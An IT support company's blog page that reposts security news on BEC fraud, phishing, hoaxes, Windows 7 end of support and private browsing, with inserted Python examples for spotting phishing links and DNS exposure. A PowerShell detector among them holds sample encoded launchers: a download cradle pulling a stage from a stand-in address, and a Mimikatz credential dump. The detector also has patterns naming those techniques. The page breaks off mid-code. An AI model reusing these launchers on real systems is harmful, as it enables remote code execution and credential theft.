
True North Networks Blog

True North Networks has been serving the Swanzey area since 2002, providing IT Support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses.

$18.6 Million Gone: Business Email Compromise at a Whole New Level

Business Email Compromise (BEC) is heavily tied to social engineering, where criminals con their way into victims' trust.

And our team just came across an incredible example of BEC that takes this crime to a whole new level.

Chinese hackers steal $18.6 million in BEC scam

The Economic Times of India is reporting on an Italian company that had its operations in India taken for a ride through Business Email Compromise and more:

The hackers sent emails to the head of Tecnimont Pvt Ltd, the Indian subsidiary of Milan-headquartered Tecnimont SpA, through an email account that looked deceptively similar to that of group CEO Pierroberto Folgiero, according to a police complaint, which ET has seen.

The hackers then arranged a series of conference calls to discuss a possible “secretive” and “highly confidential” acquisition in China. Several people played various roles during these calls, pretending to be the group.

The hackers convinced the India head that the money couldn’t be transferred from Italy due to regulatory issues.

So the Indian arm of this Italian company made three transfers to a Hong Kong bank over the course of a week in the fall of 2018: $5.6 million, $9.4 million, and $3.6 million.

The investigation has since revealed that those Hong Kong accounts were opened with fake identification documents and the money is gone.

Business Email Compromise, more sophisticated than ever

This topic really caught our attention because we just sat in on a SecureWorld web conference on NextGen Business Email Compromise.

This case proves the point made by KnowBe4 Security Awareness Advocate Erich Kron. He says a challenge for organizations now is that many underestimate the sophistication and urgency of these BEC attacks. 

"Sophisticated hackers have moved way beyond misspelled, poorly-formatted emails. Now, they turn the tables on employees, often by using fear as a trigger as if that person needs to act right now to avoid consequences for the organization or the employee."

And when you transfer $18.6 million in a week as part of a BEC scam, clearly, hackers created a sense of urgency.

Someday, someone will probably make a movie out of a heist like this. The orchestration, the planning, the conference calls full of criminals, one of whom even sounded like the company's CEO.

It is not only an incredible story. It's an incredible story of caution for CISOs, CFOs, and anyone who could be a money-making target at organizations around the globe.

The company fired its India chief and the head of accounts and finance because of the scam.


End of Windows 7 Support Could Spark PC Boom

Microsoft to discontinue free support for the popular OS, forcing upgrades to Windows 10

The days of free support for Windows 7, one of the most popular commercial and consumer operating systems in the world, will end in January 2020. Businesses will have the option of buying extended support contracts or upgrading to Windows 10. And the upgrading could spark a boom in PC sales in 2019.

The Lowdown:  Microsoft announced that its free support and patching for Windows 7 will stop Jan. 14, 2020, ending the five-year extended-support phase that began when mainstream support ended in January 2015. Microsoft will offer business users Windows 7 Extended Security Updates (ESUs) on a per-device basis, with the price increasing annually until the operating system reaches its end of life. Microsoft Windows Virtual Desktop service customers will receive the ESU at no additional cost.

The Details:  In addition, Microsoft will stop providing support for Office 365 ProPlus running on Windows 7. Businesses can buy the ESU for the productivity package for an additional three years. Other products scheduled to have their free support end in 2020 include Exchange Server 2010, Windows Server 2008/R2, and Windows 7 for Embedded Systems.

The Impact:  Windows 10, the current Microsoft operating system, recently surpassed Windows 7 among desktop and notebook operating systems. Windows 10 has a 39 percent market share, while Windows 7 has 37 percent. In real numbers, this means more than 700 million personal computers running Windows 7 around the world need either ESUs or upgrades to Windows 10.

Background:  Microsoft made no secret of its plans to discontinue free patching and support for Windows 7. Demand for new PCs running Windows 10 increased in the second half of 2018. Unfortunately, a shortage of Intel Xeon and Core processors caused inventory shortfalls that blunted PC sales (see https://channelnomics.com/2018/12/21/intel-chip-inventory-caught-short-by-unexpected-demand/). Analysts anticipate those sales will rebound in 2019 as more businesses choose to refresh their PC fleets concurrent with an upgrade to Windows 10.

Channelnomics Point of View:  PC sales have steadily declined over the past seven years, mostly due to consumers switching their primary computing device to tablets and smartphones that run non-Windows operating systems. PC sales peaked in 2011 with more than 365 million units shipping. In 2018, PC shipments tallied just 254 million. The end of support for Windows 7 could prompt more businesses to refresh their PC fleets, opening tremendous opportunities for vendors and partners to cross-sell and upsell complementary products as well as managed and cloud services. The wild card in the equation is Intel, which is trying to ramp up processor production to meet demand.

Resource: https://www.channelnomics.com/2019/01/18/ptc-launches-program-to-help-industrial-iot-customers-get-faster-time-to-value/


Is Your Business Prepared for a Winter Storm?

What would you do if your business was pummeled by a winter storm, causing power outages and cutting off access to your office and your clients?

Disaster recovery planning is an absolute must in a situation like this. It’s important to consider the impact a storm can have and to ensure you have a plan in place. Understand your vulnerabilities, safeguard against risks, and prepare for the worst.

Some things to consider to protect your business during a storm include preparing your building and ensuring there are no leaking pipes that may turn into a hazard with freezing temperatures, removing snow surrounding your building and on the roof, and obtaining a backup generator in case you lose power during the storm. For some more basic tips before and during a winter storm, head to Ready.gov.

If you’re interested in more information about how you ensure your business will not suffer during hazardous weather, check out our Natural Disaster Survival Guide for Businesses. This guide provides information about the risk levels and potential impact of various disasters, how disaster recovery planning can keep your business running, and more. Above all, stay safe during the storm!

Resource taken from: https://www.datto.com/blog/is-your-business-ready-for-a-winter-storm?utm_campaign=the-natural-disaster-survival-guide-for-businesses&utm_medium=Social&utm_source=203


CES IoT security – Do You Know Who Your Home is Talking To?

There’s a digital treasure trove to be had in your home so you should take steps to protect it.

There isn’t a square meter of the show floor here at CES that doesn’t have some gadget connected to the internet. Whether tiny robots, your next house lighting controller, or new-fangled drink machine, it’s all connected. And while we’ve worked with multiple IoT manufacturers to help secure their devices once we discover vulnerabilities, the sprawl of potentially vulnerable devices here is simply overwhelming.

For example, multiple vendors offer pieces of (or total) house control via audio. While it’s cool to have the house automatically open the curtains when you walk in and tell it to, there’s a potential downside. If someone could capture your voice, it’s easy to envision replay attacks where your house opens the doors, or those same windows so they can see what’s going on inside. This would be invaluable to would-be burglars before they attempt to break in, making sure nobody is home.

This sort of rush to market vibe runs amok here at CES – the idea that your company needs to display the latest thing to capture market share and development capital. Hopefully, security catches up along the way.

It’s easy to imagine things like whole-home ransomware, where rogue actors take over these automation systems, lock you out of them, then try to fleece you for money, and/or drain your bank account tied to a voice-activated ordering platform.

One company has a digital toothbrush that records your brushing patterns and develops trends over time. The dental industry and its insurers might view this granular information as a gold mine for marketing and determining insurance premiums. The question of privacy comes to the fore, as well as GDPR-style personal data conversations, in this case very personal. This, and other medical sensors displayed here, walk a fine line, and privacy issues aside, a data leak would be most embarrassing and potentially damaging to both the victim and the IoT provider.

As sensors become more central to the way we live, approach healthcare, and transport ourselves, the attack surface rises exponentially, especially as these sensors interface with the internet. It’s now possible to have digital spies in your house in whole new ways, but would you really know if they were?

There’s a digital treasure trove to be had in your home. At the center of it all is your home router. You know, the one you haven’t upgraded the firmware on (or there’s none available) since you bought it back in the day? Keeping track of this important digital intersection will become increasingly important, re-focusing the digital defense industry on defending your home network, which will become more complex and diverse than the corporate networks of yesteryear.

And while it’s probably not life threatening if one of those underwater robot fish they have here (really) for your low maintenance Koi pond motif goes berserk, it might still be time to update your router and home security solutions to keep an eye out for rogue machines in your house. After all, you may not know that they’ve been revealing your deepest secrets, or if they soon will.

Resource: https://www.welivesecurity.com/2019/01/10/ces-iot-security-do-you-know-who-your-home-is-talking-to/ 


Got an SMS offering $$$ refund? Don’t fall for it…

SMS, also known as text messaging, may be a bit of a “yesterday” technology, but SMS phishing is alive and well, and a good reminder that KISS really works.

If you aren’t familiar with the acronym KISS, it’s short for “keep it simple, stupid.”

Despite the rather insulting tone when you say the phrase out loud, the underlying ideas work rather well in cybercrime.

Don’t overcomplicate things; pick a believable lie and stick to it; and make it easy for the victim to “figure it out” for themselves, so they don’t feel confused or pressurised anywhere along the way.

Here’s an SMS phish we received today, claiming to come from Argos, a well-known and popular UK catalogue merchant:

You have a refund of £245. Request refund and allow 3 days for it to appear in your account.
http://argos.co.uk.XXXXXXX.shop/login

The wording here probably isn’t exactly what a UK retailer would write in English (we’re not going to say more, lest we give the crooks ideas for next time!), but it’s believable enough.

That’s because SMS messages, of necessity, rely on a brief and direct style that makes it much easier to get the spelling and grammar right.

Ironically, after years of not buying anything from Argos, we recently purchased a neat new phone for our Android research from an Argos shop – the phone we mentioned in a recent podcast, in fact – so we weren’t particularly surprised or even annoyed to see a message apparently from the company.

We suspect that many people in the UK will be in a similar position, perhaps having done some Christmas shopping at a genuine Argos, or having tried to return an unwanted gift for a genuine refund.

The login link ought to be a giveaway, but the crooks have used an age-old trick that still works well: register an innocent looking domain name, such as online.example, and add the domain name you want to phish at the start.

This works because once you own the domain online.example, you automatically acquire the right to use any subdomain, all the way from http://www.online.example to some.genuine.domain.online.example.

Because we read from left-to-right, it’s easy to spot what looks like a domain name at the left-hand end of the URL and not realise that it’s just a subdomain specified under a completely unrelated domain.

These crooks chose the top-level domain (TLD) .shop, which is open for registrations from anywhere in the world.

Although .shop domains are generally a bit pricier than TLDs such as .com and .net, we found registrars with special deals offering cool-looking .shop names starting under $10.
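As an added illustration (not part of the Naked Security post), here is a small Python checker that applies the “what matters is how it ends” rule mechanically: it finds the part of the host name that somebody actually registered and flags links where a watched brand name appears to the left of it. It uses a tiny hand-picked stand-in for the Public Suffix List rather than the full list, and treats argos.co.uk and the post’s online.example as the genuine brand domains; both are assumptions of the example.

```python
from typing import Optional
from urllib.parse import urlsplit

# Stand-in for the Public Suffix List (publicsuffix.org): suffixes under which
# anyone may register a name. Only what this example needs is listed; a real
# checker must load the full list. Assumption for illustration only.
PUBLIC_SUFFIXES = {"com", "net", "shop", "uk", "co.uk", "example"}

# Domains we want to protect. argos.co.uk is the domain the phish imitates;
# online.example is the post's own placeholder. Treating these as the brands'
# genuine registrable domains is an assumption of the example.
WATCHED_BRANDS = ("argos.co.uk", "online.example")


def registrable_domain(host: str) -> Optional[str]:
    """The part of `host` somebody actually registered: the longest matching
    public suffix plus exactly one label to its left.

      argos.co.uk.xxxxxxx.shop -> xxxxxxx.shop   (the crook's)
      www.argos.co.uk          -> argos.co.uk    (Argos's)
    """
    labels = host.lower().strip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            # labels[i:] is public; the label just to its left is the registrant's.
            return ".".join(labels[i - 1:]) if i > 0 else None
    return None  # suffix unknown to our list: cannot decide


def _contains_labels(host: str, needle: str) -> bool:
    """True if `needle` occurs in `host` as a run of whole labels
    (so 'argos' matches 'argos.co.uk.x.shop' but not 'margos.shop')."""
    return f".{needle}." in f".{host}."


def assess_link(url: str) -> dict:
    """Apply the post's checks: read the domain from the right, then note
    whether the link is even served over HTTPS."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    owner = registrable_domain(host)
    spoofed = None
    for brand in WATCHED_BRANDS:
        if owner == brand:
            break  # the registered domain really is the brand's
        # Brand name sits to the left of what was actually registered
        # (argos.co.uk.<anything>.shop), or its first label is reused.
        if _contains_labels(host, brand) or _contains_labels(host, brand.split(".")[0]):
            spoofed = brand
            break
    return {
        "host": host,
        "owner": owner,
        "https": parts.scheme == "https",
        "spoofed_brand": spoofed,
        "verdict": "suspicious" if spoofed or parts.scheme != "https" else "ok",
    }


if __name__ == "__main__":
    for link in ("http://argos.co.uk.XXXXXXX.shop/login",
                 "https://www.argos.co.uk/account",
                 "https://some.genuine.domain.online.example/"):
        print(assess_link(link))
```

The phish from the post comes back with owner `xxxxxxx.shop`, the brand flagged, and no HTTPS; the genuine `www.argos.co.uk` link passes because its registrable domain is the brand itself. Swapping the toy suffix set for the real Public Suffix List is the only change needed to use this on arbitrary links.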

What if you click through?

What harm in looking?

Well, the problem with clicking through is that you put yourself directly in harm’s way.

Visiting the link provided takes you to a pretty good facsimile of the real Argos login page, shown below on the left (the real page is on the right):

There’s not much fanfare, just a realistic clone of exactly the sort of content you’d expect to see, except for the lack of HTTPS and the not-quite-right domain name.

Getting free HTTPS certificates is pretty easy these days, so the crooks could have taken this extra step if they’d wanted.

Perhaps they were feeling lazy, or perhaps they figured that anyone who’d take care to check for the presence of a certificate might also click through to view the certificate, which would only serve to emphasise that it didn’t belong to Argos?

If you do fill in a username and password, then you have not only handed both of them to the crooks, but also embarked on a longer phishing expedition by the crooks, because the next page asks for more:

We didn’t try going any further than this, so we can’t tell you what the crooks might ask you next – but one thing is clear: by the time you get here, you’ve already given away far too much.

What to do?

  • Check the full domain name. Don’t let your eyes wander just because the server name you see in the link starts off correctly. What matters is how it ends.
  • Look for the padlock. These days, many phishing sites have a web security certificate so you will often see a padlock even on a bogus site. So the presence of a padlock doesn’t tell you much on its own. But the absence of a padlock is an instant warning saying, “Go no further!”
  • Don’t use login links in SMSes or emails. If you think you are getting a refund, find your own way to the merchant’s login page, perhaps via a bookmark, a search engine, or a printed invoice from earlier. It’s a bit slower than just clicking through but it’s way safer.

How one hacked laptop led to an entire network being compromised

A corporate laptop being used in a coffee shop at a weekend was enough to allow a sophisticated cybercrime group to compromise an organisation's entire infrastructure.

The incident was detailed by cybersecurity firm Crowdstrike as part of its Cyber Intrusion Services Casebook 2018 report and serves as a reminder that laptops and other devices that are secure while running inside the network of an organisation can be left exposed when outside company walls.

Crowdstrike described the company that fell victim to the hackers only as apparel manufacturer "with an extensive global presence, including retail locations".

The incident began when an employee of the manufacturer took their laptop to a coffee shop and used it to visit the website of one of the firm's partners.

The security researchers said the user visited the site after being directed there by a phishing email -- and that the site had been compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and WordPress sites.

The malware shows users pop-ups which claim their browser software needs updating. In this instance, the laptop was then infected with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.

The security software being used by the clothing company -- Crowdstrike didn't name the vendor -- relied on devices being inside the corporate network to pick up threats. As the laptop was being used outside the network, this incident didn't become apparent until the laptop was back in the office -- by which time it was too late.

The infected laptop then served as the attackers' entry point into the corporate network, allowing them to use the PowerShell Empire toolset to reach dozens of systems that could be compromised with nothing more than the user's own permissions.

The attackers were also able to gather additional privileged account credentials by using Mimikatz, an open-source utility used to retrieve clear text credentials and hashes from memory, to gain access to servers and further move across the network.

"Local administrator privileges made it easier for the threat actor to access a multitude of endpoints by accessing just one account that linked them all. Once access to the domain was gained, it left the organization completely exposed," Bryan York, director of professional services at Crowdstrike told ZDNet.

This exposure allowed the attackers to install Framework POS malware on the retail store server with the intention of stealing credit card data.

Researchers have identified a cyber criminal group they call Indrik Spider as the culprits of the attack. The hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns, which are thought to have netted the attackers millions of dollars.

It's the first time Indrik Spider has been associated with FakeUpdates, indicating that the group is expanding its operations as it continues to find new means of illicitly making money. Crowdstrike wouldn't say whether the campaign was successful in its goal or if credit card data was stolen from the company -- but there are lessons that organisations should take on board to avoid falling victim to similar campaigns.

Crowdstrike recommends that accounts should be segregated, and that end users shouldn't be given administrator privileges on their local systems. In this incident, the adversary abused a misconfiguration within the company's Active Directory that provided unnecessary privileges -- so the security firm recommends that organisations should regularly review Active Directory configurations across the entire global enterprise.

"Attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases we saw this year and businesses need to know how to better detect and protect against these," said York.
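Added example, not from CrowdStrike's report or the ZDNet piece: a Python triage routine for the detection gap York describes. It decodes PowerShell `-EncodedCommand` launchers out of process-creation command lines (Empire-style stagers pass their payload this way, as base64 of UTF-16LE text) and scores a handful of illustrative indicators for download cradles, `Invoke-Expression` and Mimikatz. The sample command lines, the 198.51.100.7 address and the indicator patterns are constructed for the example; they are not signatures from the report.

```python
import base64
import re

# Illustrative indicators (constructed for this example, not a vendor
# signature set). An Empire stage-one launcher is typically a no-profile,
# non-interactive, hidden powershell.exe carrying an -EncodedCommand payload
# that downloads and IEXes the next stage; Mimikatz is usually loaded
# in memory via Invoke-Mimikatz.
LAUNCHER_FLAGS = re.compile(r"-(?:NoP|NonI|W\s+Hidden|EncodedCommand|Enc)\b", re.I)
PAYLOAD_PATTERNS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "mimikatz": re.compile(r"Invoke-Mimikatz|sekurlsa::logonpasswords", re.I),
}
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|Enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_for_powershell(script: str) -> str:
    """Encode the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script when `cmdline` carries -Enc/-EncodedCommand,
    otherwise None. Bad base64 or non-UTF-16 payloads also yield None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Score one process-creation command line (e.g. from Windows event 4688
    or Sysmon event 1). The decoded payload is searched too, so encoding
    alone does not hide the cradle."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    flags = sorted({re.sub(r"\s+", " ", f).lower() for f in LAUNCHER_FLAGS.findall(cmdline)})
    indicators = [name for name, pat in PAYLOAD_PATTERNS.items() if pat.search(haystack)]
    return {
        "decoded": decoded,
        "flags": flags,
        "indicators": indicators,
        # Any payload indicator is enough on its own; the launcher-flag
        # combination is suspicious but also used by some legitimate tooling.
        "alert": bool(indicators) or len(flags) >= 3,
    }


# Constructed sample command lines (not real telemetry). 198.51.100.7 is a
# documentation address (RFC 5737).
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/launcher')"
SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -NonI -W Hidden -Enc {encode_for_powershell(STAGE)}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    f"powershell.exe -nop -w hidden -e {encode_for_powershell('Invoke-Mimikatz -DumpCreds')}",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze(line)
        print("ALERT " if result["alert"] else "ok    ", result["flags"], result["indicators"])
```

Process-creation auditing with command-line capture (or Sysmon) is the prerequisite; without it the encoded launcher is never seen. The decoder is the important part: matching on the base64 string itself is useless because every stager's payload differs, while the decoded text always contains the cradle.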

Resource: https://www.zdnet.com/article/how-one-hacked-laptop-led-to-an-entire-network-being-compromised/


How To Spot a Social Media Hoax

Well, well, well, if it isn’t the WhatsApp Gold/’martinelli’ video scam, back again, as half-bunk and half-real-threat as ever.

Excellent! It’s a great opportunity to offer some advice on pulling the rug out from under these and other scammers. For the dissection of Gold/martinelli, read on. For some advice to forward to the prey of the scammers, jump on further down!

The current bunk

As Snopes tells it, the WhatsApp Gold scam messages have been kicking around since at least 2016 in varyingly worded messages, claiming that some new “premium service” would get users extra goodies, such as video calling and new emojis.

Hey Finally Secret WhatsApp golden version has been leaked, This version is used only by big celebrities. Now we can use it too.

Users who clicked on the link got no goodies. They got baddies, in the form of a malware-rigged, non-WhatsApp website. The malware, nicknamed WhatsApp Gold, was designed to break into phones and steal victims’ messages and other private data.

Bad enough, eh? Well, the mad cyber scientists decided to make it a bit more poisonous when they wrapped a true warning about the real WhatsApp Gold malware around a bogus warning about a fictional video called martinelli.

This scam burrito has been getting passed around since at least mid-2017, picking up only minor word swaps but still refusing to unglue its death-grip on arbitrary, proofreader-taunting, inappropriate spaces around punctuation.

The version we saw in November:

If you know anyone using WhatsApp you might pass on this. An IT colleague has advised that a video comes out tomorrow from WhatsApp called martinelli do not open it , it hacks your phone and nothing will fix it. Spread the word. If you receive a message to update the Whatsapp to Whatsapp Gold, do not click !!!!!
Now said on the news this virus is difficult and severe

Pass it on to all

According to multiple news outlets, that sage, fictional “IT colleague” is back again, once again babbling about this equally fictional martinelli video.

That’s just fine, you scammers. We’re back again, too, you purveyors of WhatsApp Fool’s Gold. We’re here to tell you how to spot these hoaxes. Sage IT colleague types, please do enlighten the not-so-IT-savvy among you with these nuggets.

How to spot WhatsApp hoaxes

Atrocious punctuation and feeble English are common in phishing/spam/hoax messages, but we need more tools than that to discern when something’s a threat. After all, it’s not a given that a) non-threat-actors (as in, our friends) know how to use commas, et al., or b) scammers don’t use proper English and punctuation. To that end, keep an eye out for these elements on top of funky, clunky English:

Call to action. As Sophos’s John Shier has noted in an excellent “Phish or legit?” walk-through, most phishing campaigns snap their fingers at you.

Scam WhatsApp messages and Facebook hoaxes have a call to action, too: they urge readers to copy/paste the warning and forward it to others. It’s meant to add a sense of urgency to the message and compel you to do something.

The threat. As WhatsApp notes in its FAQ about hoax messages, hoaxers often claim you can avoid punishment, such as account suspension, if you forward the message. A sender might imply that they have the law on their side, and that they’ll use their law enforcement affiliations should you be up to something dodgy.

In the case of WhatsApp Gold/martinelli, the “threat” is from a (nonexistent) video, and that you shouldn’t click on a link urging you to update Whatsapp to Whatsapp Gold (true!), lest your phone get hacked.

Authority figures. To make the threat convincing, hoaxers often sprinkle in references to voices of authority. If it’s not the cops, it’s that Gold/martinelli “IT colleague”. Way, way too often, friends will pass on these words from purported experts, or police, or the tax authorities, reasoning that “it can’t hurt.”

And after you’ve spotted the Gold/martinelli or any other hoax…

Don’t forward. Just warn them without the forward. Consider doing it by private message. After all, if you comment on, say, a Facebook post itself, you’re adding to its page ranking, pushing it all that much closer to going viral.

Like Sophos’s Paul Ducklin said in a recent video, it can do us harm when we copy, paste and spread somebody else’s lies. It hurts our reputations and our accountability. Who needs that?

Arm yourself against WhatsApp Gold malware

Staying safe online means keeping out all the malware that’s out there, not just the one or two rogue applications you hear about via friends’ WhatsApp messages.

Instead, just follow some simple advice to keep your phone secure, and advise your friends and family to do the same:

  • Apply security updates promptly.
  • Get your apps from the App Store or Google Play.
  • Use security software like Sophos Mobile Security for iOS or Android.

Resource taken from: 


NSA will release a free tool for reverse engineering malware

It's helping to improve security rather than undermine it.

The NSA has frequently been accused of holding on to info that could potentially improve security, but this time it's being a little less secretive. The agency is planning to release a free reverse engineering tool, GHIDRA, in tandem with the RSA Conference on March 5th. The software dissects binaries for Android, iOS, macOS and Windows, turning them into assembly code that can help analyze malware or pinpoint questionable activity in otherwise innocent-looking software.

ZDNet noted that this kind of software isn't strictly new, and GHIDRA in particular isn't secret (it mainly entered the spotlight with the Vault 7 leak). However, existing reverse engineering options like IDA are expensive and generally inaccessible -- this would let any reasonably knowledgeable person tear open a program and gain a better understanding of what makes it tick.

As with the NSA's other open source projects, this isn't an altruistic gesture. In addition to improving overall security, it could improve the quality of GHIDRA by letting the community address bugs and introduce their own features. Whatever the NSA loses in control it might gain through better overall security.

Resource taken from: https://www.engadget.com/2019/01/06/nsa-releasing-code-reverse-engineering-tool/


Cybersecurity 101: How to Browse the Web Securely and Privately

So you want to browse the web securely and privately? Here’s a hard truth: it’s almost impossible.

It’s not just your internet provider that knows which sites you visit, it’s also the government — and other governments! And when it’s not them, it’s social media sites, ad networks or apps tracking you across the web to serve you specific and targeted ads. Your web browsing history can be highly personal. It can reveal your health concerns, your political beliefs and even your porn habits — you name it. Why should anyone other than you know those things?

Any time you visit a website, you leave a trail of data behind you. You can’t stop it all — that’s just how the internet works. But there are plenty of things that you can do to reduce your footprint.

Here are a few tips to cover most of your bases.

A VPN can help hide your identity, but doesn’t make you anonymous

You might have heard that a VPN — or a virtual private network — might keep your internet traffic safe from snoopers. Well, not really.

A VPN lets you create a dedicated tunnel that all of your internet traffic flows through — usually a VPN server — allowing you to hide your internet traffic from your internet provider. That’s good if you’re in a country where censorship or surveillance is rife or trying to avoid location-based blocking. But otherwise, you’re just sending all of your internet traffic to a VPN provider instead. Essentially, you have to choose who you trust more: your VPN provider or your internet provider. The problem is, most free VPN providers make their money by selling your data or serving you ads — and some are just downright shady. Even if you use a premium VPN provider for privacy, they can connect your payment information to your internet traffic, and many VPN providers don’t even bother to encrypt your data.

Some VPN providers are better than others: tried, tested — and trusted — by security professionals.

VPN protocols like WireGuard are highly recommended, and are available on a variety of devices and systems, including iPhones and iPads. We recently profiled the Guardian Mobile Firewall, a smart firewall-type app for your iPhone that securely tunnels your data anonymously so that even its creators don’t know who you are. The app also prevents apps on your phone from tracking you and accessing your data, like your contacts or your geolocation.

As TechCrunch’s Romain Dillet explains, the best VPN providers are the ones that you control yourself. You can create your own Algo VPN server in just a few minutes. Algo is created by Trail of Bits, a highly trusted and respected security company in New York. The source code is available on GitHub, making it far more difficult to covertly insert backdoors into the code.

With your own Algo VPN setup, you control the connection, the server, and your data.

You’ll need a secure DNS

What does it mean that “your internet provider knows what sites you visit,” anyway?

Behind the scenes on the internet, DNS — or Domain Name System — converts web addresses into computer-readable IP addresses. Most devices automatically use the resolver that’s set by the network you’re connected to — usually your internet provider. That means your internet provider knows what websites you’re visiting. And recently, Congress passed a law allowing your internet provider to sell your browsing history to advertisers.

You need a secure and private DNS provider. Many use publicly available services — like OpenDNS or Google’s Public DNS. They’re easy to set up — usually on your computer or device, or on your home router.

One recommended offering is Cloudflare’s secure DNS, which it calls 1.1.1.1. Cloudflare encrypts your DNS queries (it supports DNS over HTTPS and DNS over TLS, so your internet provider sees a connection to the resolver, not which names you look up), won’t use your data to serve ads, and doesn’t store your IP address for any longer than 24 hours. You can get started here, and you can even download Cloudflare’s 1.1.1.1 app from Apple’s App Store and Google Play.
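To make concrete what “your internet provider knows what sites you visit” means, here is an added Python example (not from the TechCrunch article) that builds a plain DNS query the way your device sends it to port 53, shows the name sitting readable in the bytes, and then wraps the identical packet as a DNS over HTTPS GET request (RFC 8484) against Cloudflare’s published `https://cloudflare-dns.com/dns-query` endpoint, where only the TLS connection to the resolver is visible on the wire. Nothing is sent over the network; the packet is built and inspected locally.

```python
import base64
import struct

DOH_ENDPOINT = "https://cloudflare-dns.com/dns-query"  # Cloudflare's RFC 8484 endpoint


def build_dns_query(name: str, qtype: int = 1, txid: int = 0) -> bytes:
    """Build a plain DNS query (RFC 1035 wire format) for `name`.

    qtype 1 = A record. txid 0 follows the RFC 8484 advice for GET requests,
    so identical queries produce identical, cacheable URLs.
    """
    # Header: ID, flags (RD=1 -> 0x0100), QDCOUNT=1, ANCOUNT/NSCOUNT/ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        qname += bytes([len(raw)]) + raw          # length-prefixed label
    qname += b"\x00"                              # root terminator
    question = qname + struct.pack("!HH", qtype, 1)  # QTYPE, QCLASS=IN
    return header + question


def visible_name(packet: bytes) -> str:
    """What a passive observer on the path (ISP, coffee-shop Wi-Fi) reads
    straight out of a UDP/53 query: the queried name, no key needed."""
    labels, pos = [], 12                          # question follows the 12-byte header
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def doh_get_url(packet: bytes, endpoint: str = DOH_ENDPOINT) -> str:
    """Wrap the same packet for DNS over HTTPS: base64url without padding as
    the `dns` query parameter. This travels inside TLS to the resolver, so an
    observer sees a connection to the resolver, not the name."""
    token = base64.urlsafe_b64encode(packet).rstrip(b"=").decode("ascii")
    return f"{endpoint}?dns={token}"


def doh_param_to_packet(url: str) -> bytes:
    """Reverse of doh_get_url: what the resolver does on receipt (re-pad, decode)."""
    token = url.split("dns=", 1)[1]
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))


if __name__ == "__main__":
    pkt = build_dns_query("example.com")
    print("plaintext query bytes:   ", pkt.hex())
    print("name readable on the wire:", visible_name(pkt))
    print("same query over DoH:     ", doh_get_url(pkt))
```

The `hex()` output makes the point by itself: `example` and `com` appear as ASCII in the UDP payload, which is exactly what a resolver run by your internet provider logs. The DoH URL carries the same 29 bytes, but only the resolver sees them after TLS is stripped, which is why choosing a resolver you trust still matters.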

HTTPS is your friend

One of the best things for personal internet security is HTTPS.

HTTPS secures your connection from your phone or your computer all the way to the site you’re visiting. Most major websites are HTTPS-enabled, and appear as such with a green padlock in the address bar. HTTPS makes it almost impossible for someone to spy on your internet traffic, intercept it, and steal your data in transit.

Every time your browser lights up in green or flashes a padlock, HTTPS encrypts the connection between your computer and the website. Even when you’re on a public Wi-Fi network, an HTTPS-enabled website will protect you from snoopers on the same network.

Every day, the web becomes more secure, but there’s a way to go. Some websites are HTTPS ready but don’t have it enabled by default. That means you’re loading an unencrypted HTTP page when you could be accessing a fully HTTPS page.

That’s where one browser extension, HTTPS Everywhere, comes into play. This extension automatically forces websites to load HTTPS by default. It’s a lightweight, handy tool that you’ll forget is even there.

Reconsider your web plug-ins

Remember Flash? How about Java? You probably haven’t seen much of them recently, because the web has evolved to render them obsolete. Both Flash and Java, two once-popular web plug-ins, let you view interactive content in your web browser. But nowadays, most of that has been replaced by HTML5, a technology native to your web browser.

Flash and Java were long derided for their perpetual state of insecurity. They were full of bugs and vulnerabilities that plagued the internet for years — so much so that web browsers started to pull the plug on Java back in 2015, with Flash set to sunset in 2020. Good riddance!

If you don’t use them — and most people don’t anymore — you should remove them. Just having them installed can put you at risk of attack. It takes just a minute to uninstall Flash on Windows and Mac, and to uninstall Java on Windows and Mac.

Most browsers — like Firefox and Chrome — let you run other add-ons or extensions to improve your web experience. Like apps on your phone, they often require certain access to your browser, your data or even your computer. Although browser extensions are usually vetted and checked to prevent malicious use, sometimes bad extensions slip through the net. Sometimes, extensions that were once fine are automatically updated to contain malicious code or secretly mine cryptocurrency in the background.

There’s no simple rule for what’s a good extension and what isn’t. Use your judgment. Make sure each extension you install doesn’t ask for more access than you think it needs, and look again after updates, since an update can add permissions. And uninstall any extension that you no longer use.
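To make “doesn’t ask for more access than it needs” something you can check rather than guess, here is an added example (not part of the TechCrunch guide) in Python that reads a Chrome or Chromium extension’s manifest.json and flags broad host access and high-risk API permissions. The permission names and match-pattern syntax are Chrome’s own; the risk tiers, the sample manifests and the extension names are this example’s constructions.

```python
"""Audit browser extension manifests for over-broad permissions (added example)."""
import json
import os
import re

# Assumed risk tiers. The names are real Chrome API permissions; the grouping
# is this example's judgement, not a ranking published by Chrome.
HIGH_RISK_PERMISSIONS = {
    "webRequest", "webRequestBlocking", "declarativeNetRequestWithHostAccess",
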